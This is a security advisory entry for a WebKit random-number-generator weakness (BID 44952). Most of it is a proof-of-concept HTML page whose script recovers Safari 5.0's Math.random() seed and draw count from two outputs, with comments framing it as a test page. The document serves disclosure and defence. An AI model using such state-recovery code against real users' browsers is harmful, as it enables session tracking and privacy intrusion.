source: https://www.securityfocus.com/bid/44952/info
WebKit is prone to a random-number-generator weakness.
Attackers can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage.
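Successful attacks will allow attackers to track user sessions and obtain personal information that can aid in further attacks. The test page below shows the underlying problem: from two consecutive Math.random() outputs, a script can recover the generator's seed and the number of values drawn so far.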
NOTE: This issue was previously covered in BID 44938 (Apple Safari Prior to 5.0.3 and 4.1.3 Multiple Security Vulnerabilities) but has been given its own record to better document it.
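<!doctype html>
<!--
  Test page for the WebKit random-number-generator weakness (BID 44952).
  It checks whether the browser it runs in exposes the state of the
  generator behind Math.random(): on an affected build, the seed and the
  number of values drawn so far ("mileage") can be computed from two
  consecutive outputs. On any other browser it reports "Could not find seed".

  Defender's reading: Math.random() output is not secret and must not be
  used for session identifiers, tokens or nonces. The title of BID 44938
  names Safari 5.0.3 and 4.1.3 as the releases that ended the affected
  range; confirm against the vendor advisory.
-->
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Safari 5.0 (Windows) Math.random() seed check (BID 44952)</title>
</head>
<body>
  <!-- Filled in by script with textContent, so the user-agent string is
       shown as text and never parsed as markup. -->
  <p id="ua"></p>

  <!-- Result area written by calc_seed(). -->
  <div id="foo"></div>

  <form>
    <input type="button" id="calc"
           value="Calculate Safari 5.0 (Windows) PRNG seed and mileage">
  </form>

  <script>
    document.getElementById("ua").textContent =
      "userAgent: " + navigator.userAgent;

    /**
     * Takes two consecutive Math.random() outputs, walks the generator
     * state backwards, and writes the result into the "foo" element.
     *
     * Reports "PRNG Seed", the seed read as a Unix time in seconds, and
     * "PRNG mileage" (the number of backward steps taken) when a state
     * matching the seeding pattern is found within 10000 steps; otherwise
     * reports that no seed was found.
     *
     * All working values are declared locally so the function no longer
     * leaks r1, r2, H, L and k into the global scope.
     */
    function calc_seed()
    {
      var r1, r2, H, L, k;

      // Two consecutive outputs, scaled from [0,1) to the 32-bit range.
      // They must be drawn back to back, with no other Math.random() call
      // in between.
      r1 = Math.random() * Math.pow(2, 32);
      r2 = Math.random() * Math.pow(2, 32);

      // Presumably H and L are the generator's two 32-bit state words:
      // H is taken directly from the first output, L is the second output
      // minus H with its 16-bit halves swapped (mod 2^32).
      H = r1;
      L = (r2 - (((H & 0xFFFF0000) >>> 16) | ((H & 0x0000FFFF) << 16)))
          & 0xFFFFFFFF;

      // 10000 is just an arbitrary limit to make sure the
      // algorithm doesn't run into an endless loop on
      // non-vulnerable browsers
      for (k = 0; k < 10000; k++)
      {
        // One backward step: two subtractions mod 2^32, then swap the
        // 16-bit halves of H. The order of these three statements matters.
        L = (L - H) & 0xFFFFFFFF;
        H = (H - L) & 0xFFFFFFFF;
        H = ((H & 0xFFFF0000) >>> 16) | ((H & 0x0000FFFF) << 16);

        // A state whose words differ by exactly this XOR mask is treated
        // as the freshly seeded state; presumably the mask is what the
        // generator applies at seeding (confirm against the WebKit source).
        if ((H ^ L) == 0x49616E42)
        {
          // NOTE(review): H is a signed 32-bit value here (result of the
          // bitwise OR), so a seed with the top bit set would be printed
          // as a negative number and date.
          document.getElementById("foo").innerText =
            "PRNG Seed: " + H + " " +
            "(First page rendered: " +
            (new Date(H * 1000)).toString() + ")\n" +
            "PRNG mileage: " + k;
          return;
        }
      }

      document.getElementById("foo").innerText =
        "Could not find seed\n" +
        "Are you sure it's Safari 5.0 for Windows?";
      return;
    }

    // Bound here instead of through an inline onClick attribute, so the
    // page also works under a Content-Security-Policy that forbids inline
    // event handlers.
    document.getElementById("calc").addEventListener("click", calc_seed, false);
  </script>
</body>
</html>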